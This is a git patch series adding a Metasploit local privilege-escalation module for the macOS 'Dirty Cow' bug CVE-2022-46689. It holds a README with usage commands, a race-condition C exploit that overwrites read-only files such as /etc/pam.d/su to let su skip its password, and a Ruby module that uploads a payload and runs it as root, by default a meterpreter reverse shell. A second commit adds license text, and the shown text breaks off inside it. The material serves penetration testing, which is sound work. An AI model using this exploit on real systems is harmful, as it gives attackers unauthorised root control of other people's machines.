From ce260f53f36e9101d6458e41eabf83e65949328f Mon Sep 17 00:00:00 2001 From: timwr <684924+timwr@users.noreply.github.com> Date: Tue, 27 Dec 2022 04:39:55 +0700 Subject: [PATCH 1/8] Add CVE-2022-46689 macOS dirty cow --- .../source/exploits/CVE-2022-46689/Makefile | 8 + .../source/exploits/CVE-2022-46689/README.md | 44 +++ .../vm_unaligned_copy_switch_race.c | 359 ++++++++++++++++++ modules/exploits/osx/local/mac_dirty_cow.rb | 122 ++++++ 4 files changed, 533 insertions(+) create mode 100644 external/source/exploits/CVE-2022-46689/Makefile create mode 100644 external/source/exploits/CVE-2022-46689/README.md create mode 100644 external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c create mode 100644 modules/exploits/osx/local/mac_dirty_cow.rb diff --git a/external/source/exploits/CVE-2022-46689/Makefile b/external/source/exploits/CVE-2022-46689/Makefile new file mode 100644 index 000000000000..68bb1bc57a1c --- /dev/null +++ b/external/source/exploits/CVE-2022-46689/Makefile @@ -0,0 +1,8 @@ + +all: + clang -o switcharoo vm_unaligned_copy_switch_race.c + +install: + mkdir -p ../../../../data/exploits/CVE-2022-46689/ + cp switcharoo ../../../../data/exploits/CVE-2022-46689/exploit + diff --git a/external/source/exploits/CVE-2022-46689/README.md b/external/source/exploits/CVE-2022-46689/README.md new file mode 100644 index 000000000000..0295b16d46dc --- /dev/null +++ b/external/source/exploits/CVE-2022-46689/README.md @@ -0,0 +1,44 @@ +Get root on macOS 13.0.1 with [CVE-2022-46689](https://support.apple.com/en-us/HT213532) (macOS equivalent of the Dirty Cow bug), using the testcase extracted from [Apple's XNU source](https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c). + +https://worthdoingbadly.com/macdirtycow/ + +## Usage +On a macOS 13.0.1 / 12.6.1 (or below) machine, run: + +``` +clang -o switcharoo vm_unaligned_copy_switch_race.c +sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin +./switcharoo /etc/pam.d/su overwrite_file.bin +su +``` + +You should get: + +``` +% ./switcharoo /etc/pam.d/su overwrite_file.bin +Testing for 10 seconds... +RO mapping was modified +% su +sh-3.2# +``` + +Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on). + +If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read: + +``` +$ ./switcharoo /etc/pam.d/su overwrite_file.bin +Testing for 10 seconds... +vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0 +Ran 13705 times in 10 seconds with no failure +``` + +and running `su` should still ask for a password. + +Thanks to Sealed System Volume, running this on any file on the /System volume only modifies the file temporarily: It's reverted on reboot. Running it on a file on a writeable volume will preserve the modification after a reboot. + +## Credits + +- Ian Beer of Project Zero for finding the issue. Looking forward to your writeup! +- Apple for the test case. (I didn't change anything: I just added the command line parameter to control what to overwrite.) +- [SSLab@Gatech](https://gts3.org/assets/papers/2020/jin:pwn2own2020-safari-slides.pdf) for the trick to disable password checking using `/etc/pam.d`. diff --git a/external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c b/external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c new file mode 100644 index 000000000000..0c5567b398bc --- /dev/null +++ b/external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c @@ -0,0 +1,359 @@ +// from https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c +// modified to compile outside of XNU + +// clang -o switcharoo vm_unaligned_copy_switch_race.c +// sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin +// ./switcharoo /etc/pam.d/su overwrite_file.bin +// su + +#include +#include +#include + +#include +#include +#include + +#include +#include + +#define T_QUIET +#define T_EXPECT_MACH_SUCCESS(a, b) +#define T_EXPECT_MACH_ERROR(a, b, c) +#define T_ASSERT_MACH_SUCCESS(a, b, ...) +#define T_ASSERT_MACH_ERROR(a, b, c) +#define T_ASSERT_POSIX_SUCCESS(a, b) +#define T_ASSERT_EQ(a, b, c) do{if ((a) != (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0) +#define T_ASSERT_NE(a, b, c) do{if ((a) == (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0) +#define T_ASSERT_TRUE(a, b, ...) +#define T_LOG(a, ...) fprintf(stderr, a "\n", __VA_ARGS__) +#define T_DECL(a, b) static void a(void) +#define T_PASS(a, ...) fprintf(stderr, a "\n", __VA_ARGS__) + +static const char* g_arg_target_file_path; +static const char* g_arg_overwrite_file_path; + +struct context1 { + vm_size_t obj_size; + vm_address_t e0; + mach_port_t mem_entry_ro; + mach_port_t mem_entry_rw; + dispatch_semaphore_t running_sem; + pthread_mutex_t mtx; + bool done; +}; + +static void * +switcheroo_thread(__unused void *arg) +{ + kern_return_t kr; + struct context1 *ctx; + + ctx = (struct context1 *)arg; + /* tell main thread we're ready to run */ + dispatch_semaphore_signal(ctx->running_sem); + while (!ctx->done) { + /* wait for main thread to be done setting things up */ + pthread_mutex_lock(&ctx->mtx); + /* switch e0 to RW mapping */ + kr = vm_map(mach_task_self(), + &ctx->e0, + ctx->obj_size, + 0, /* mask */ + VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, + ctx->mem_entry_rw, + 0, + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RW"); + /* wait a little bit */ + usleep(100); + /* switch back to original RO mapping */ + kr = vm_map(mach_task_self(), + &ctx->e0, + ctx->obj_size, + 0, /* mask */ + VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, + ctx->mem_entry_ro, + 0, + FALSE, /* copy */ + VM_PROT_READ, + VM_PROT_READ, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RO"); + /* tell main thread we're don switching mappings */ + pthread_mutex_unlock(&ctx->mtx); + usleep(100); + } + return NULL; +} + +T_DECL(unaligned_copy_switch_race, + "Test that unaligned copy respects read-only mapping") +{ + pthread_t th = NULL; + int ret; + kern_return_t kr; + time_t start, duration; + mach_msg_type_number_t cow_read_size; + vm_size_t copied_size; + int loops; + vm_address_t e2, e5; + struct context1 context1, *ctx; + int kern_success = 0, kern_protection_failure = 0, kern_other = 0; + vm_address_t ro_addr, tmp_addr; + memory_object_size_t mo_size; + + ctx = &context1; + ctx->obj_size = 256 * 1024; + ctx->e0 = 0; + ctx->running_sem = dispatch_semaphore_create(0); + T_QUIET; T_ASSERT_NE(ctx->running_sem, NULL, "dispatch_semaphore_create"); + ret = pthread_mutex_init(&ctx->mtx, NULL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_mutex_init"); + ctx->done = false; + ctx->mem_entry_rw = MACH_PORT_NULL; + ctx->mem_entry_ro = MACH_PORT_NULL; +#if 0 + /* allocate our attack target memory */ + kr = vm_allocate(mach_task_self(), + &ro_addr, + ctx->obj_size, + VM_FLAGS_ANYWHERE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate ro_addr"); + /* initialize to 'A' */ + memset((char *)ro_addr, 'A', ctx->obj_size); +#endif + int fd = open(g_arg_target_file_path, O_RDONLY | O_CLOEXEC); + ro_addr = (uintptr_t)mmap(NULL, ctx->obj_size, PROT_READ, MAP_SHARED, fd, 0); + /* make it read-only */ + kr = vm_protect(mach_task_self(), + ro_addr, + ctx->obj_size, + TRUE, /* set_maximum */ + VM_PROT_READ); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_protect ro_addr"); + /* make sure we can't get read-write handle on that target memory */ + mo_size = ctx->obj_size; + kr = mach_make_memory_entry_64(mach_task_self(), + &mo_size, + ro_addr, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &ctx->mem_entry_ro, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_MACH_ERROR(kr, KERN_PROTECTION_FAILURE, "make_mem_entry() RO"); + /* take read-only handle on that target memory */ + mo_size = ctx->obj_size; + kr = mach_make_memory_entry_64(mach_task_self(), + &mo_size, + ro_addr, + MAP_MEM_VM_SHARE | VM_PROT_READ, + &ctx->mem_entry_ro, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RO"); + T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size"); + /* make sure we can't map target memory as writable */ + tmp_addr = 0; + kr = vm_map(mach_task_self(), + &tmp_addr, + ctx->obj_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + ctx->mem_entry_ro, + 0, + FALSE, /* copy */ + VM_PROT_READ, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw"); + tmp_addr = 0; + kr = vm_map(mach_task_self(), + &tmp_addr, + ctx->obj_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + ctx->mem_entry_ro, + 0, + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw"); + + /* allocate a source buffer for the unaligned copy */ + kr = vm_allocate(mach_task_self(), + &e5, + ctx->obj_size, + VM_FLAGS_ANYWHERE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e5"); + /* initialize to 'C' */ + memset((char *)e5, 'C', ctx->obj_size); + + FILE* overwrite_file = fopen(g_arg_overwrite_file_path, "r"); + fseek(overwrite_file, 0, SEEK_END); + size_t overwrite_length = ftell(overwrite_file); + if (overwrite_length >= PAGE_SIZE) { + fprintf(stderr, "too long!\n"); + exit(1); + } + fseek(overwrite_file, 0, SEEK_SET); + char* e5_overwrite_ptr = (char*)(e5 + ctx->obj_size - overwrite_length); + fread(e5_overwrite_ptr, 1, overwrite_length, overwrite_file); + fclose(overwrite_file); + + int overwrite_first_diff_offset = -1; + char overwrite_first_diff_value = 0; + for (int off = 0; off < overwrite_length; off++) { + if (((char*)ro_addr)[off] != e5_overwrite_ptr[off]) { + overwrite_first_diff_offset = off; + overwrite_first_diff_value = ((char*)ro_addr)[off]; + } + } + if (overwrite_first_diff_offset == -1) { + fprintf(stderr, "no diff?\n"); + exit(1); + } + + /* + * get a handle on some writable memory that will be temporarily + * switched with the read-only mapping of our target memory to try + * and trick copy_unaligned to write to our read-only target. + */ + tmp_addr = 0; + kr = vm_allocate(mach_task_self(), + &tmp_addr, + ctx->obj_size, + VM_FLAGS_ANYWHERE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate() some rw memory"); + /* initialize to 'D' */ + memset((char *)tmp_addr, 'D', ctx->obj_size); + /* get a memory entry handle for that RW memory */ + mo_size = ctx->obj_size; + kr = mach_make_memory_entry_64(mach_task_self(), + &mo_size, + tmp_addr, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &ctx->mem_entry_rw, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RW"); + T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size"); + kr = vm_deallocate(mach_task_self(), tmp_addr, ctx->obj_size); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate() tmp_addr 0x%llx", (uint64_t)tmp_addr); + tmp_addr = 0; + + pthread_mutex_lock(&ctx->mtx); + + /* start racing thread */ + ret = pthread_create(&th, NULL, switcheroo_thread, (void *)ctx); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create"); + + /* wait for racing thread to be ready to run */ + dispatch_semaphore_wait(ctx->running_sem, DISPATCH_TIME_FOREVER); + + duration = 10; /* 10 seconds */ + T_LOG("Testing for %ld seconds...", duration); + for (start = time(NULL), loops = 0; + time(NULL) < start + duration; + loops++) { + /* reserve space for our 2 contiguous allocations */ + e2 = 0; + kr = vm_allocate(mach_task_self(), + &e2, + 2 * ctx->obj_size, + VM_FLAGS_ANYWHERE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate to reserve e2+e0"); + + /* make 1st allocation in our reserved space */ + kr = vm_allocate(mach_task_self(), + &e2, + ctx->obj_size, + VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(240)); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e2"); + /* initialize to 'B' */ + memset((char *)e2, 'B', ctx->obj_size); + + /* map our read-only target memory right after */ + ctx->e0 = e2 + ctx->obj_size; + kr = vm_map(mach_task_self(), + &ctx->e0, + ctx->obj_size, + 0, /* mask */ + VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(241), + ctx->mem_entry_ro, + 0, + FALSE, /* copy */ + VM_PROT_READ, + VM_PROT_READ, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() mem_entry_ro"); + + /* let the racing thread go */ + pthread_mutex_unlock(&ctx->mtx); + /* wait a little bit */ + usleep(100); + + /* trigger copy_unaligned while racing with other thread */ + kr = vm_read_overwrite(mach_task_self(), + e5, + ctx->obj_size, + e2 + overwrite_length, + &copied_size); + T_QUIET; + T_ASSERT_TRUE(kr == KERN_SUCCESS || kr == KERN_PROTECTION_FAILURE, + "vm_read_overwrite kr %d", kr); + switch (kr) { + case KERN_SUCCESS: + /* the target was RW */ + kern_success++; + break; + case KERN_PROTECTION_FAILURE: + /* the target was RO */ + kern_protection_failure++; + break; + default: + /* should not happen */ + kern_other++; + break; + } + /* check that our read-only memory was not modified */ + T_QUIET; T_ASSERT_EQ(((char *)ro_addr)[overwrite_first_diff_offset], overwrite_first_diff_value, "RO mapping was modified"); + + /* tell racing thread to stop toggling mappings */ + pthread_mutex_lock(&ctx->mtx); + + /* clean up before next loop */ + vm_deallocate(mach_task_self(), ctx->e0, ctx->obj_size); + ctx->e0 = 0; + vm_deallocate(mach_task_self(), e2, ctx->obj_size); + e2 = 0; + } + + ctx->done = true; + pthread_join(th, NULL); + + kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_rw); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_rw)"); + kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_ro); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_ro)"); + kr = vm_deallocate(mach_task_self(), ro_addr, ctx->obj_size); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(ro_addr)"); + kr = vm_deallocate(mach_task_self(), e5, ctx->obj_size); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(e5)"); + + + T_LOG("vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d", + kern_success, kern_protection_failure, kern_other); + T_PASS("Ran %d times in %ld seconds with no failure", loops, duration); +} + +int main(int argc, char** argv) { + if (argc != 3) { + fprintf(stderr, "usage: %s target_file overwrite_file\n", argv[0]); + return 0; + } + g_arg_target_file_path = argv[1]; + g_arg_overwrite_file_path = argv[2]; + unaligned_copy_switch_race(); +} diff --git a/modules/exploits/osx/local/mac_dirty_cow.rb b/modules/exploits/osx/local/mac_dirty_cow.rb new file mode 100644 index 000000000000..ff46ce1dbc92 --- /dev/null +++ b/modules/exploits/osx/local/mac_dirty_cow.rb @@ -0,0 +1,122 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + prepend Msf::Exploit::Remote::AutoCheck + include Msf::Post::File + include Msf::Post::OSX::Priv + include Msf::Post::OSX::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation', + 'Description' => %q{ + An app may be able to execute arbitrary code with kernel privileges + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Ian Beer', # discovery + 'Zhuowei Zhang', # proof of concept + 'timwr' # metasploit integration + ], + 'References' => [ + ['CVE', '2022-46689'], + ['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'], + ['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }, + 'Targets' => [ + [ 'Mac OS X x64 (Native Payload)', {} ], + ], + 'DisclosureDate' => '2022-12-17', + 'Notes' => { + 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES], + 'Reliability' => [REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE] + } + ) + ) + register_advanced_options [ + OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + def check + version = Rex::Version.new(get_system_version) + if version > Rex::Version.new('13.0.1') + CheckCode::Safe + elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1') + CheckCode::Safe + elsif version < Rex::Version.new('10.15') + CheckCode::Safe + else + CheckCode::Appears + end + end + + def exploit + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless writable? datastore['WritableDir'] + fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" + end + + payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" + binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) + upload_and_chmodx payload_file, binary_payload + register_file_for_cleanup payload_file + + target_file = datastore['TargetFile'] + current_content = read_file(target_file) + backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" + unless write_file(backup_file, current_content) + fail_with Failure::BadConfig, "#{backup_file} is not writable" + end + register_file_for_cleanup backup_file + + replace_content = current_content.sub('rootok', 'permit') + + replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" + unless write_file(replace_file, replace_content) + fail_with Failure::BadConfig, "#{replace_file} is not writable" + end + register_file_for_cleanup replace_file + + exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}" + exploit_exe = exploit_data 'CVE-2022-46689', 'exploit' + upload_and_chmodx exploit_file, exploit_exe + register_file_for_cleanup exploit_file + + exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}" + print_status("Executing exploit '#{exploit_cmd}'") + result = cmd_exec(exploit_cmd) + print_status("Exploit result:\n#{result}") + + su_cmd = "echo '#{payload_file} & disown' | su" + print_status("Running cmd:\n#{su_cmd}") + result = cmd_exec(su_cmd) + unless result.blank? + print_status("Command output:\n#{result}") + end + + exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}" + print_status("Executing exploit (restoring) '#{exploit_cmd}'") + result = cmd_exec(exploit_cmd) + print_status("Exploit result:\n#{result}") + end + +end From 057f04618659ed59ea2d75e0576cd8d117f691aa Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 1 Feb 2023 16:46:45 -0500 Subject: [PATCH 2/8] Updated license file --- LICENSE | 376 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 376 insertions(+) diff --git a/LICENSE b/LICENSE index d445ac6be397..2cbe05ff5e66 100644 --- a/LICENSE +++ b/LICENSE @@ -92,6 +92,13 @@ Copyright: 1999 AT&T Laboratories Cambridge. 2000-2009 TightVNC Group License: GPL-2 +Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c +Copyright: 1999-2007 Apple Inc. +License: Apple +Purpose: This source file is necessary for users to create a stand-alone executable + to exploit CVE-2022-46689, a local privilege escalation vulnerability in + MacOSX versios macOS dirty cow + Files: data/templates/to_mem_pshreflection.ps1.template Copyright: 2012, Matthew Graeber License: BSD-3-clause @@ -898,3 +905,372 @@ License: Zlib 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. + +License: Apple +APPLE PUBLIC SOURCE LICENSE +Version 2.0 - August 6, 2003 + +Please read this License carefully before downloading this software. +By downloading or using this software, you are agreeing to be bound by +the terms of this License. If you do not or cannot agree to the terms +of this License, please do not download or use the software. + +1. General; Definitions. This License applies to any program or other +work which Apple Computer, Inc. ("Apple") makes publicly available and +which contains a notice placed by Apple identifying such program or +work as "Original Code" and stating that it is subject to the terms of +this Apple Public Source License version 2.0 ("License"). As used in +this License: + +1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is +the grantor of rights, (i) claims of patents that are now or hereafter +acquired, owned by or assigned to Apple and (ii) that cover subject +matter contained in the Original Code, but only to the extent +necessary to use, reproduce and/or distribute the Original Code +without infringement; and (b) in the case where You are the grantor of +rights, (i) claims of patents that are now or hereafter acquired, +owned by or assigned to You and (ii) that cover subject matter in Your +Modifications, taken alone or in combination with Original Code. + +1.2 "Contributor" means any person or entity that creates or +contributes to the creation of Modifications. + +1.3 "Covered Code" means the Original Code, Modifications, the +combination of Original Code and any Modifications, and/or any +respective portions thereof. + +1.4 "Externally Deploy" means: (a) to sublicense, distribute or +otherwise make Covered Code available, directly or indirectly, to +anyone other than You; and/or (b) to use Covered Code, alone or as +part of a Larger Work, in any way to provide a service, including but +not limited to delivery of content, through electronic communication +with a client other than You. + +1.5 "Larger Work" means a work which combines Covered Code or portions +thereof with code not governed by the terms of this License. + +1.6 "Modifications" mean any addition to, deletion from, and/or change +to, the substance and/or structure of the Original Code, any previous +Modifications, the combination of Original Code and any previous +Modifications, and/or any respective portions thereof. When code is +released as a series of files, a Modification is: (a) any addition to +or deletion from the contents of a file containing Covered Code; +and/or (b) any new file or other representation of computer program +statements that contains any part of Covered Code. + +1.7 "Original Code" means (a) the Source Code of a program or other +work as originally made available by Apple under this License, +including the Source Code of any updates or upgrades to such programs +or works made available by Apple under this License, and that has been +expressly identified by Apple as such in the header file(s) of such +work; and (b) the object code compiled from such Source Code and +originally made available by Apple under this License. + +1.8 "Source Code" means the human readable form of a program or other +work that is suitable for making modifications to it, including all +modules it contains, plus any associated interface definition files, +scripts used to control compilation and installation of an executable +(object code). + +1.9 "You" or "Your" means an individual or a legal entity exercising +rights under this License. For legal entities, "You" or "Your" +includes any entity which controls, is controlled by, or is under +common control with, You, where "control" means (a) the power, direct +or indirect, to cause the direction or management of such entity, +whether by contract or otherwise, or (b) ownership of fifty percent +(50%) or more of the outstanding shares or beneficial ownership of +such entity. + +2. Permitted Uses; Conditions & Restrictions. Subject to the terms +and conditions of this License, Apple hereby grants You, effective on +the date You accept this License and download the Original Code, a +world-wide, royalty-free, non-exclusive license, to the extent of +Apple's Applicable Patent Rights and copyrights covering the Original +Code, to do the following: + +2.1 Unmodified Code. You may use, reproduce, display, perform, +internally distribute within Your organization, and Externally Deploy +verbatim, unmodified copies of the Original Code, for commercial or +non-commercial purposes, provided that in each instance: + +(a) You must retain and reproduce in all copies of Original Code the +copyright and other proprietary notices and disclaimers of Apple as +they appear in the Original Code, and keep intact all notices in the +Original Code that refer to this License; and + +(b) You must include a copy of this License with every copy of Source +Code of Covered Code and documentation You distribute or Externally +Deploy, and You may not offer or impose any terms on such Source Code +that alter or restrict this License or the recipients' rights +hereunder, except as permitted under Section 6. + +2.2 Modified Code. You may modify Covered Code and use, reproduce, +display, perform, internally distribute within Your organization, and +Externally Deploy Your Modifications and Covered Code, for commercial +or non-commercial purposes, provided that in each instance You also +meet all of these conditions: + +(a) You must satisfy all the conditions of Section 2.1 with respect to +the Source Code of the Covered Code; + +(b) You must duplicate, to the extent it does not already exist, the +notice in Exhibit A in each file of the Source Code of all Your +Modifications, and cause the modified files to carry prominent notices +stating that You changed the files and the date of any change; and + +(c) If You Externally Deploy Your Modifications, You must make +Source Code of all Your Externally Deployed Modifications either +available to those to whom You have Externally Deployed Your +Modifications, or publicly available. Source Code of Your Externally +Deployed Modifications must be released under the terms set forth in +this License, including the license grants set forth in Section 3 +below, for as long as you Externally Deploy the Covered Code or twelve +(12) months from the date of initial External Deployment, whichever is +longer. You should preferably distribute the Source Code of Your +Externally Deployed Modifications electronically (e.g. download from a +web site). + +2.3 Distribution of Executable Versions. In addition, if You +Externally Deploy Covered Code (Original Code and/or Modifications) in +object code, executable form only, You must include a prominent +notice, in the code itself as well as in related documentation, +stating that Source Code of the Covered Code is available under the +terms of this License with information on how and where to obtain such +Source Code. + +2.4 Third Party Rights. You expressly acknowledge and agree that +although Apple and each Contributor grants the licenses to their +respective portions of the Covered Code set forth herein, no +assurances are provided by Apple or any Contributor that the Covered +Code does not infringe the patent or other intellectual property +rights of any other entity. Apple and each Contributor disclaim any +liability to You for claims brought by any other entity based on +infringement of intellectual property rights or otherwise. As a +condition to exercising the rights and licenses granted hereunder, You +hereby assume sole responsibility to secure any other intellectual +property rights needed, if any. For example, if a third party patent +license is required to allow You to distribute the Covered Code, it is +Your responsibility to acquire that license before distributing the +Covered Code. + +3. Your Grants. In consideration of, and as a condition to, the +licenses granted to You under this License, You hereby grant to any +person or entity receiving or distributing Covered Code under this +License a non-exclusive, royalty-free, perpetual, irrevocable license, +under Your Applicable Patent Rights and other intellectual property +rights (other than patent) owned or controlled by You, to use, +reproduce, display, perform, modify, sublicense, distribute and +Externally Deploy Your Modifications of the same scope and extent as +Apple's licenses under Sections 2.1 and 2.2 above. + +4. Larger Works. You may create a Larger Work by combining Covered +Code with other code not governed by the terms of this License and +distribute the Larger Work as a single product. In each such instance, +You must make sure the requirements of this License are fulfilled for +the Covered Code or any portion thereof. + +5. Limitations on Patent License. Except as expressly stated in +Section 2, no other patent rights, express or implied, are granted by +Apple herein. Modifications and/or Larger Works may require additional +patent licenses from Apple which Apple may grant in its sole +discretion. + +6. Additional Terms. You may choose to offer, and to charge a fee for, +warranty, support, indemnity or liability obligations and/or other +rights consistent with the scope of the license granted herein +("Additional Terms") to one or more recipients of Covered Code. +However, You may do so only on Your own behalf and as Your sole +responsibility, and not on behalf of Apple or any Contributor. You +must obtain the recipient's agreement that any such Additional Terms +are offered by You alone, and You hereby agree to indemnify, defend +and hold Apple and every Contributor harmless for any liability +incurred by or claims asserted against Apple or such Contributor by +reason of any such Additional Terms. + +7. Versions of the License. Apple may publish revised and/or new +versions of this License from time to time. Each version will be given +a distinguishing version number. Once Original Code has been published +under a particular version of this License, You may continue to use it +under the terms of that version. You may also choose to use such +Original Code under the terms of any subsequent version of this +License published by Apple. No one other than Apple has the right to +modify the terms applicable to Covered Code created under this +License. + +8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in +part pre-release, untested, or not fully tested works. The Covered +Code may contain errors that could cause failures or loss of data, and +may be incomplete or contain inaccuracies. You expressly acknowledge +and agree that use of the Covered Code, or any portion thereof, is at +Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND +WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND +APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE +PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM +ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT +NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF +MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR +PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD +PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST +INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE +FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS, +THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR +ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO +ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE +AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY. +You acknowledge that the Covered Code is not intended for use in the +operation of nuclear facilities, aircraft navigation, communication +systems, or air traffic control machines in which case the failure of +the Covered Code could lead to death, personal injury, or severe +physical or environmental damage. + +9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO +EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL, +SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING +TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR +ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY, +TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF +APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY +REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF +INCIDENTAL OR 